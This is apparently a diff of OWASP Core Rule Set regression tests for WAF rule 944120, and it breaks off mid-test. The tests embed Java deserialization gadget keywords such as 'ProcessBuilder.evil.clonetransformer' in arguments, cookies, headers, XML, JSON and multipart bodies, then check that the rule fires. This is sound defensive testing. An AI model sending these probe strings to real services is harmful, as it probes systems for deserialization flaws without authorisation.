"ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.prototypeserializationfactory - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-105 - desc: "Cookie name includes keyword ProcessBuilder.evil.prototypeserializationfactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.prototypeserializationfactory=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-106 - desc: "Request header test includes keyword ProcessBuilder.evil.prototypeserializationfactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: ProcessBuilder.evil.prototypeserializationfactory - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-107 - desc: "XML element includes keyword ProcessBuilder.evil.prototypeserializationfactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - - - test_title: 944120-108 - desc: "XML attribute name includes keyword ProcessBuilder.evil.prototypeserializationfactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944120\"" - - - - test_title: 944120-109 - desc: "XML attribute value includes keyword ProcessBuilder.evil.prototypeserializationfactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-110 - desc: "XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.prototypeserializationfactory" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-111 - desc: "Nested XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.prototypeserializationfactory" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-112 - desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.prototypeserializationfactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.prototypeserializationfactory" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-113 - desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.prototypeserializationfactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"ProcessBuilder.evil.prototypeserializationfactory\"}" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-114 - desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.prototypeserializationfactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"ProcessBuilder.evil.prototypeserializationfactory\": \"test\"}" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-115 - desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.prototypeserializationfactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/json\r\n\r\n{\"ProcessBuilder.evil.prototypeserializationfactory\": \"test\"}\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-116 - desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.prototypeserializationfactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/json\r\n\r\n{\"ProcessBuilder.evil.prototypeserializationfactory\": \"test\"}\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-117 - desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/xml\r\n\r\nProcessBuilder.evil.prototypeserializationfactory\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-118 - desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/xml\r\n\r\nProcessBuilder.evil.prototypeserializationfactory\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - test_title: 944120-119 - desc: "Argument test includes keyword ProcessBuilder.evil.whileclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.whileclosure" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-120 - desc: "Argument name includes keyword ProcessBuilder.evil.whileclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.whileclosure=test" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-121 - desc: "Cookie test includes keyword ProcessBuilder.evil.whileclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.whileclosure - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-122 - desc: "Cookie name includes keyword ProcessBuilder.evil.whileclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.whileclosure=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-123 - desc: "Request header test includes keyword ProcessBuilder.evil.whileclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: ProcessBuilder.evil.whileclosure - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-124 - desc: "XML element includes keyword ProcessBuilder.evil.whileclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - - - test_title: 944120-125 - desc: "XML attribute name includes keyword ProcessBuilder.evil.whileclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944120\"" - - - - test_title: 944120-126 - desc: "XML attribute value includes keyword ProcessBuilder.evil.whileclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-127 - desc: "XML element value includes keyword ProcessBuilder.evil.whileclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.whileclosure" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-128 - desc: "Nested XML element value includes keyword ProcessBuilder.evil.whileclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.whileclosure" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-129 - desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.whileclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.whileclosure" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-130 - desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.whileclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"ProcessBuilder.evil.whileclosure\"}" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-131 - desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.whileclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"ProcessBuilder.evil.whileclosure\": \"test\"}" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-132 - desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.whileclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/json\r\n\r\n{\"ProcessBuilder.evil.whileclosure\": \"test\"}\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-133 - desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.whileclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/json\r\n\r\n{\"ProcessBuilder.evil.whileclosure\": \"test\"}\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-134 - desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.whileclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/xml\r\n\r\nProcessBuilder.evil.whileclosure\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" - - - - test_title: 944120-135 - desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.whileclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - version: "HTTP/1.0" - data: "-----------------------------thisissparta\r\nContent-Disposition: form-data; name=\"payload\"\r\nContent-Type: application/xml\r\n\r\nProcessBuilder.evil.whileclosure\r\n-----------------------------thisissparta--" - output: - log_contains: "id \"944120\"" +meta: + author: "spartantri" + enabled: true + name: "944120.yaml" + description: "Positive tests for rule 944120" +tests: + - test_title: 944120-1 + desc: "Argument test includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.clonetransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-2 + desc: "Argument name includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.clonetransformer=test" + output: + log_contains: "id \"944120\"" + - test_title: 944120-3 + desc: "Cookie test includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.clonetransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-4 + desc: "Cookie name includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.clonetransformer=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-5 + desc: "Request header test includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.clonetransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-6 + desc: "XML element includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-7 + desc: "XML attribute name includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-8 + desc: "XML attribute value includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-9 + desc: "XML element value includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.clonetransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-10 + desc: "Nested XML element value includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.clonetransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-11 + desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.clonetransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-12 + desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: 